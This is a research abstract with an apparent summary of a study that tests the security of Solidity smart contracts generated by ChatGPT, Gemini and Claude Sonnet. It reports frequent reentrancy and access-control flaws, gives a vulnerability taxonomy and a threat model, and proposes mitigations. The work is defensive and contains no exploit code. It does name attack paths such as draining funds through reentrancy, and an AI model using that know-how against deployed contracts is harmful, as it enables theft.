Evaluating the Vulnerability Landscape of LLM-Generated Smart Contracts
Large language models (LLMs) have been widely adopted in modern software development lifecycles, where they are increasingly used to automate and assist code generation, significantly improving developer productivity and reducing development time. In the blockchain domain, developers increasingly rely on LLMs to generate and maintain smart contracts, the immutable, self-executing components of decentralized applications. Because deployed smart contracts cannot be modified, correctness and security are paramount, particularly in high-stakes domains such as finance and governance. Despite this growing reliance, the security implications of LLM-generated smart contracts remain insufficiently understood. In this work, we conduct a systematic security analysis of Solidity smart contracts generated by state-of-the-art LLMs, including ChatGPT, Gemini, and Sonnet. We evaluate these contracts against a broad set of known smart contract vulnerabilities to assess their suitability for direct deployment in production environments. Our extensive experimental study shows that, despite their syntactic correctness and functional completeness, LLM-generated smart contracts frequently exhibit severe security flaws that could be exploited in real-world settings. We further analyze and categorize these vulnerabilities, identifying recurring weakness patterns across different models. Finally, we discuss practical countermeasures and development guidelines to help mitigate these risks, offering actionable insights for both developers and researchers. Our findings aim to support safe integration of LLMs into smart contract development workflows and to strengthen the overall security of the blockchain ecosystem against future security failures.
💡 Research Summary
The paper investigates the security properties of Solidity smart contracts automatically generated by state‑of‑the‑art large language models (LLMs). The authors focus on three widely used general‑purpose LLMs—ChatGPT (GPT‑4.1), Gemini‑2.5, and Claude Sonnet‑4.5—because these are the models most developers interact with in everyday coding tasks. To emulate realistic development workflows, the researchers design a set of natural‑language prompts that describe typical blockchain applications such as ERC‑20 token contracts, decentralized autonomous organization (DAO) voting mechanisms, auctions, marketplaces, and social‑network‑style contracts. For each application domain they create 5‑10 distinct prompts, yielding a corpus of roughly 30 contracts per model.
The generation pipeline is deliberately simple: a prompt is sent to the LLM, the model returns raw Solidity source code, the code is compiled, and a minimal functional test suite is run to ensure basic correctness. No further manual editing is performed before the security assessment, mirroring a “generate‑and‑deploy” scenario that many developers might adopt when they trust the model’s output.
Security evaluation proceeds in two stages. First, the authors run static analysis tools (Slither, SmartCheck) and a curated list of 30 well‑known vulnerability patterns derived from the SWC‑ID registry, covering reentrancy, integer overflow/underflow, missing access control, timestamp dependence, proxy upgrade flaws, and others. Second, they complement static checks with dynamic fuzzing (VulnSEE, Manticore) to capture runtime‑only issues. Each contract is thus labeled with the number and severity of discovered flaws.
Results show that while all three LLMs produce syntactically correct code with a high compilation success rate (≈ 85 % of contracts compile without errors), security is far from guaranteed. On average each contract contains 3.7 critical vulnerabilities. Reentrancy is the most prevalent defect, appearing in 68 % of the generated contracts. The root cause is the models’ tendency to emit low‑level call.value or transfer statements without automatically inserting the canonical “checks‑effects‑interactions” pattern. Access‑control omissions are also common: modifiers such as onlyOwner are either defined but never applied, or msg.sender checks are written incorrectly, allowing unauthorized parties to invoke privileged functions. Although Solidity 0.8.x includes built‑in overflow checks, the models sometimes omit the pragma version or deliberately place arithmetic inside unchecked blocks, re‑introducing overflow risk.
Model‑specific observations reveal distinct bias patterns. ChatGPT tends to generate code that follows the latest Solidity style guides and includes up‑to‑date pragma statements, yet it frequently mishandles complex multi‑step logic, leading to logical errors that are not caught by simple unit tests. Gemini‑2.5 often repeats variable and function declarations, inflating gas consumption and making static analysis noisier. Claude Sonnet‑4.5 is aggressive in satisfying prompt constraints, inserting many redundant require statements; this can cause condition inversion bugs where the intended guard is accidentally negated.
From these findings the authors construct a “LLM‑Induced Vulnerability Taxonomy” comprising seven layers: (1) structural skeleton flaws, (2) missing or misapplied access control, (3) reentrancy exposure, (4) arithmetic errors, (5) uninitialized state variables, (6) uncontrolled external calls, and (7) gas‑optimization neglect. Each layer maps to specific code patterns observed across models and domains, and the taxonomy serves as a checklist for auditors reviewing AI‑generated contracts.
The threat model assumes an attacker who monitors newly deployed contracts and exploits any of the identified weaknesses immediately after deployment, before the contract’s assets can be secured or the code can be upgraded. Attack scenarios include draining token balances via reentrancy, hijacking governance by bypassing owner checks, and causing denial‑of‑service through unchecked loops.
To mitigate these risks, the paper proposes a set of practical guidelines: (i) always run both static and dynamic analysis on LLM‑generated code; (ii) embed explicit security directives in the prompt (e.g., request nonReentrant modifiers, require onlyOwner on privileged functions); (iii) enforce the use of the latest Solidity compiler version and strict pragma settings; (iv) expand test suites to cover edge cases, especially around state changes and external calls; (v) maintain a model‑specific “vulnerability fingerprint” database to inform prompt engineering; (vi) perform thorough test‑net deployment and penetration testing before main‑net launch; (vii) when using upgradeable proxy patterns, add additional validation logic to guard the upgrade function itself.
In conclusion, the study demonstrates that while LLMs dramatically accelerate smart‑contract development, the current generation quality is insufficient for direct, production‑grade deployment without a rigorous security review pipeline. The authors call for tighter integration of automated security tools into AI‑assisted development workflows, better prompt engineering practices, and heightened awareness among developers about the unique threat surface introduced by AI‑generated blockchain code. This work fills a gap in the literature by systematically quantifying LLM‑induced vulnerabilities in smart contracts and offering concrete steps to safeguard the rapidly expanding blockchain ecosystem.
Comments & Academic Discussion
Loading comments...
Leave a Comment